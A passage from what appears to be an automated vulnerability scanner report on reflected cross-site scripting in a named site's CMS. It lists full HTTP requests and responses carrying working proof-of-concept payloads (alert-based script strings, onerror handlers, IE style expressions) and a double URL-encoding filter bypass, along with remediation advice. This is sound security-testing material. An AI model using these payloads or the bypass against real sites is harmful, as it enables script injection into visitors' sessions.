This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/725e6"style%3d"x%3aexpression(alert(1))"c7800b57464/technology_finance/tech_pages/techrecovery.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:02 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=725e6"style="x:expression(alert(1))"c7800b57464; Expires=Fri, 25-Nov-2011 03:02:53 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:02 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 14618
Connection: close


<!-- try /technology_finance/tech_pages -->
<!-- try /technology_finance -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/725e6"style="x:expression(alert(1))"c7800b57464/technology_finance/tech_pages/techrecovery.html">
...[SNIP]...

2.105. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4540d"-alert(1)-"18e2547227e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d064540d"-alert(1)-"18e2547227e HTTP/1.1
Host: gecapsol.com
Proxy-Connection: keep-alive
Referer: http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06%22-alert(1)-%22c79e5188c0f/about_us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cms_preferred_language=en24d06"-alert(1)-"c79e5188c0f

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:25:10 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d064540d"-alert(1)-"18e2547227e; Expires=Fri, 25-Nov-2011 03:25:10 GMT; Path=/cms/
Set-Cookie: JSESSIONID=9CACDD974B44BD4A1E98442535D8EA5E; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:25:10 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 24299


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>GE Capital - equipm
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d064540d"-alert(1)-"18e2547227e/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.106. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1980a"><img%20src%3da%20onerror%3dalert(1)>25244211e95 was submitted in the REST URL parameter 6. This input was echoed as 1980a"><img src=a onerror=alert(1)>25244211e95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d061980a"><img%20src%3da%20onerror%3dalert(1)>25244211e95 HTTP/1.1
Host: gecapsol.com
Proxy-Connection: keep-alive
Referer: http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06%22-alert(1)-%22c79e5188c0f/about_us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cms_preferred_language=en24d06"-alert(1)-"c79e5188c0f

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:25:08 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d061980a"><img src=a onerror=alert(1)>25244211e95; Expires=Fri, 25-Nov-2011 03:25:08 GMT; Path=/cms/
Set-Cookie: JSESSIONID=97978E932D0B76F046883C575693CF74; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:25:08 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 25667


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>GE Capital - equipm
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d061980a"><img src=a onerror=alert(1)>25244211e95/index.html">
...[SNIP]...

2.107. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14561"><img%20src%3da%20onerror%3dalert(1)>244d4c0759c was submitted in the REST URL parameter 6. This input was echoed as 14561"><img src=a onerror=alert(1)>244d4c0759c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d0614561"><img%20src%3da%20onerror%3dalert(1)>244d4c0759c/ HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:16 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d0614561"><img src=a onerror=alert(1)>244d4c0759c; Expires=Fri, 25-Nov-2011 03:49:14 GMT; Path=/cms/
Set-Cookie: JSESSIONID=B98518AD03760F48C145F3063766BAD4; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:16 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 25667
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>GE Capital - equipm
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d0614561"><img src=a onerror=alert(1)>244d4c0759c/index.html">
...[SNIP]...

2.108. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93ea6"-alert(1)-"b094eb9a3b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d0693ea6"-alert(1)-"b094eb9a3b/ HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:31 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d0693ea6"-alert(1)-"b094eb9a3b; Expires=Fri, 25-Nov-2011 03:49:24 GMT; Path=/cms/
Set-Cookie: JSESSIONID=22D156242A758FF00C0FCF795C09F7F3; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:31 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 24223
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>GE Capital - equipm
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d0693ea6"-alert(1)-"b094eb9a3b/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.109. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6db73"-alert(1)-"ef10a784537 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d066db73"-alert(1)-"ef10a784537/about_us HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:34 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d066db73"-alert(1)-"ef10a784537; Expires=Fri, 25-Nov-2011 03:49:28 GMT; Path=/cms/
Set-Cookie: JSESSIONID=320B196BA8F346A5FFD13693ED6ABDCD; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:34 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17777
Connection: close


<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equi
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d066db73"-alert(1)-"ef10a784537/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.110. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e9c"style%3d"x%3aexpression(alert(1))"cc43d3477c8 was submitted in the REST URL parameter 6. This input was echoed as d2e9c"style="x:expression(alert(1))"cc43d3477c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06d2e9c"style%3d"x%3aexpression(alert(1))"cc43d3477c8/about_us HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:21 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d06d2e9c"style="x:expression(alert(1))"cc43d3477c8; Expires=Fri, 25-Nov-2011 03:49:11 GMT; Path=/cms/
Set-Cookie: JSESSIONID=C307258905BEC752693CC7D80C9CF5FF; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:21 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 18822
Connection: close


<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equi
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06d2e9c"style="x:expression(alert(1))"cc43d3477c8/about_us/index.html">
...[SNIP]...

2.111. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/businesses/corporate_aircraft_financing.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/businesses/corporate_aircraft_financing.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b56e5"-alert(1)-"25a183d7df was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06b56e5"-alert(1)-"25a183d7df/about_us/businesses/corporate_aircraft_financing.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:26 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d06b56e5"-alert(1)-"25a183d7df; Expires=Fri, 25-Nov-2011 03:49:21 GMT; Path=/cms/
Set-Cookie: JSESSIONID=3AD7CD78C044A23731A7823D0761C968; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:26 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 16580
Connection: close


<!-- try /about_us/businesses -->
<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transition
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06b56e5"-alert(1)-"25a183d7df/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.112. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/businesses/corporate_aircraft_financing.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/businesses/corporate_aircraft_financing.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f464"%20style%3dx%3aexpression(alert(1))%207cd86ba461c was submitted in the REST URL parameter 6. This input was echoed as 6f464" style=x:expression(alert(1)) 7cd86ba461c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d066f464"%20style%3dx%3aexpression(alert(1))%207cd86ba461c/about_us/businesses/corporate_aircraft_financing.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:14 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d066f464" style=x:expression(alert(1)) 7cd86ba461c; Expires=Fri, 25-Nov-2011 03:49:13 GMT; Path=/cms/
Set-Cookie: JSESSIONID=DEBEAD8D42C301D2FCA28482024566EE; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:14 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17600
Connection: close


<!-- try /about_us/businesses -->
<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transition
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d066f464" style=x:expression(alert(1)) 7cd86ba461c/about_us/businesses/corporate_aircraft_financing.html">
...[SNIP]...

2.113. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/businesses/distribution_finance.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/businesses/distribution_finance.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cc08%2522%253e%253ca%253e2c32956579b was submitted in the REST URL parameter 6. This input was echoed as 2cc08"><a>2c32956579b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d062cc08%2522%253e%253ca%253e2c32956579b/about_us/businesses/distribution_finance.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:48:55 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d062cc08"><a>2c32956579b; Expires=Fri, 25-Nov-2011 03:48:46 GMT; Path=/cms/
Set-Cookie: JSESSIONID=A35AF4840F0385208FCB302D2C7545F9; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:48:55 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 15903
Connection: close


<!-- try /about_us/businesses -->
<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transition
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d062cc08"><a>2c32956579b/about_us/businesses/distribution_finance.html">
...[SNIP]...

2.114. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/help/FAQ.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/help/FAQ.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d220"-alert(1)-"4c14e23dd1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d062d220"-alert(1)-"4c14e23dd1/about_us/help/FAQ.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:15 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d062d220"-alert(1)-"4c14e23dd1; Expires=Fri, 25-Nov-2011 03:49:10 GMT; Path=/cms/
Set-Cookie: JSESSIONID=F1B0F32BF2D5993E5A028CBDBF5DE377; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:15 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 16214
Connection: close


<!-- try /about_us/help -->
<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<htm
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d062d220"-alert(1)-"4c14e23dd1/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.115. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/help/FAQ.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/help/FAQ.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6007d"><x%20style%3dx%3aexpression(alert(1))>12accc6ad35 was submitted in the REST URL parameter 6. This input was echoed as 6007d"><x style=x:expression(alert(1))>12accc6ad35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d066007d"><x%20style%3dx%3aexpression(alert(1))>12accc6ad35/about_us/help/FAQ.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:03 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d066007d"><x style=x:expression(alert(1))>12accc6ad35; Expires=Fri, 25-Nov-2011 03:48:54 GMT; Path=/cms/
Set-Cookie: JSESSIONID=59B0F32500324758D43AFA9989085964; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:03 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17341
Connection: close


<!-- try /about_us/help -->
<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<htm
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d066007d"><x style=x:expression(alert(1))>12accc6ad35/about_us/help/FAQ.html">
...[SNIP]...

2.116. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/index.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/index.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 547f4"-alert(1)-"29625e541f6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06547f4"-alert(1)-"29625e541f6/about_us/index.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=ED77F8B1A175746A840873AFE8FC931E; cms_preferred_language=en24d06;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:49:12 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en24d06547f4"-alert(1)-"29625e541f6; Expires=Fri, 25-Nov-2011 03:49:01 GMT; Path=/cms/
Set-Cookie: JSESSIONID=A45C67D1E45604F8A2640653AE290FBF; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:49:12 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 17777
Connection: close


<!-- try /about_us -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equi
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06547f4"-alert(1)-"29625e541f6/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.117. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en24d06/about_us/terms.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://gecapsol.com
